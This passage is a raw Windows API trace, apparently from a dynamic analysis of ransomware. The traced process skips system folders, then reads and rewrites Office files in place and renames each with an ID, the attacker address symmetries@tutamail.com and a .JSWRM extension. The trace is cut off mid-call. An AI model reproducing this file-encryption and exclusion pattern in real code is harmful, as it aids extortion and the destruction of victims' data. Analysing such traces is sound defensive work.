[0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="system volume information") returned -1 [0141.053] lstrcmpiW (lpString1="DGLINACC.XML", lpString2="msocache") returned -1 [0141.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLINACC.XML", lpUsedDefaultChar=0x0) returned 12 [0141.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLINACC.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLINACC.XML", lpUsedDefaultChar=0x0) returned 12 [0141.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLINACC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglinacc.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.054] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=542) returned 1 [0141.054] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.054] ReadFile (in: hFile=0x238, lpBuffer=0x231078, nNumberOfBytesToRead=0x210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x231078*, lpNumberOfBytesRead=0x345e89c*=0x210, lpOverlapped=0x0) returned 1 [0141.056] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.056] WriteFile (in: hFile=0x238, lpBuffer=0x231078*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x231078*, lpNumberOfBytesWritten=0x345e898*=0x210, lpOverlapped=0x0) returned 1 [0141.057] CloseHandle (hObject=0x238) returned 1 [0141.057] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLINACC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglinacc.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLINACC.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglinacc.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.058] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ebf, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGLOGO.DPV", cAlternateFileName="")) returned 1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2=".") returned 1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="..") returned 1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="...") returned 1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="windows") returned -1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="recovery") returned -1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="perflogs") returned -1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="documents and settings") returned -1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="system volume information") returned -1 [0141.058] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="msocache") returned -1 [0141.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLOGO.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLOGO.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLOGO.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglogo.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.059] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11967) returned 1 [0141.059] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.060] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2eb0, lpOverlapped=0x0) returned 1 [0141.062] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.062] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2eb0, lpOverlapped=0x0) returned 1 [0141.062] CloseHandle (hObject=0x238) returned 1 [0141.062] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLOGO.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglogo.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLOGO.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglogo.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.063] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7ac, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGLOGO.XML", cAlternateFileName="")) returned 1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2=".") returned 1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="..") returned 1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="...") returned 1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="windows") returned -1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="recovery") returned -1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="perflogs") returned -1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="documents and settings") returned -1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="system volume information") returned -1 [0141.063] lstrcmpiW (lpString1="DGLOGO.XML", lpString2="msocache") returned -1 [0141.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLOGO.XML", lpUsedDefaultChar=0x0) returned 10 [0141.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGLOGO.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGLOGO.XML", lpUsedDefaultChar=0x0) returned 10 [0141.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLOGO.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglogo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.065] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1964) returned 1 [0141.065] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.065] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7a0, lpOverlapped=0x0) returned 1 [0141.067] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.067] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7a0, lpOverlapped=0x0) returned 1 [0141.067] CloseHandle (hObject=0x238) returned 1 [0141.067] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLOGO.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglogo.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGLOGO.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dglogo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.068] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe39, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGMAIN.XML", cAlternateFileName="")) returned 1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2=".") returned 1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="..") returned 1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="...") returned 1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="windows") returned -1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="recovery") returned -1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="perflogs") returned -1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="documents and settings") returned -1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="system volume information") returned -1 [0141.068] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="msocache") returned -1 [0141.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMAIN.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMAIN.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMAIN.XML", lpUsedDefaultChar=0x0) returned 10 [0141.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMAIN.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMAIN.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMAIN.XML", lpUsedDefaultChar=0x0) returned 10 [0141.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMAIN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmain.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.070] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3641) returned 1 [0141.070] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.070] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe30, lpOverlapped=0x0) returned 1 [0141.071] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.071] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe30, lpOverlapped=0x0) returned 1 [0141.072] CloseHandle (hObject=0x238) returned 1 [0141.072] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMAIN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmain.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMAIN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmain.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.073] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGMARQ.DPV", cAlternateFileName="")) returned 1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2=".") returned 1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="..") returned 1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="...") returned 1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="windows") returned -1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="recovery") returned -1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="perflogs") returned -1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="documents and settings") returned -1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="system volume information") returned -1 [0141.073] lstrcmpiW (lpString1="DGMARQ.DPV", lpString2="msocache") returned -1 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMARQ.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMARQ.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMARQ.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmarq.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.074] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11264) returned 1 [0141.074] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.074] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2c00, lpOverlapped=0x0) returned 1 [0141.076] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.076] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2c00, lpOverlapped=0x0) returned 1 [0141.076] CloseHandle (hObject=0x238) returned 1 [0141.076] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMARQ.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmarq.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGMARQ.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgmarq.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.077] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGMARQ.XML", cAlternateFileName="")) returned 1 [0141.077] lstrcmpiW (lpString1="DGMARQ.XML", lpString2=".") returned 1 [0141.077] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="..") returned 1 [0141.077] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="...") returned 1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="windows") returned -1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="recovery") returned -1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="perflogs") returned -1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="documents and settings") returned -1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="system volume information") returned -1 [0141.078] lstrcmpiW (lpString1="DGMARQ.XML", lpString2="msocache") returned -1 [0141.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMARQ.XML", lpUsedDefaultChar=0x0) returned 10 [0141.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGMARQ.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGMARQ.XML", lpUsedDefaultChar=0x0) returned 10 [0141.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 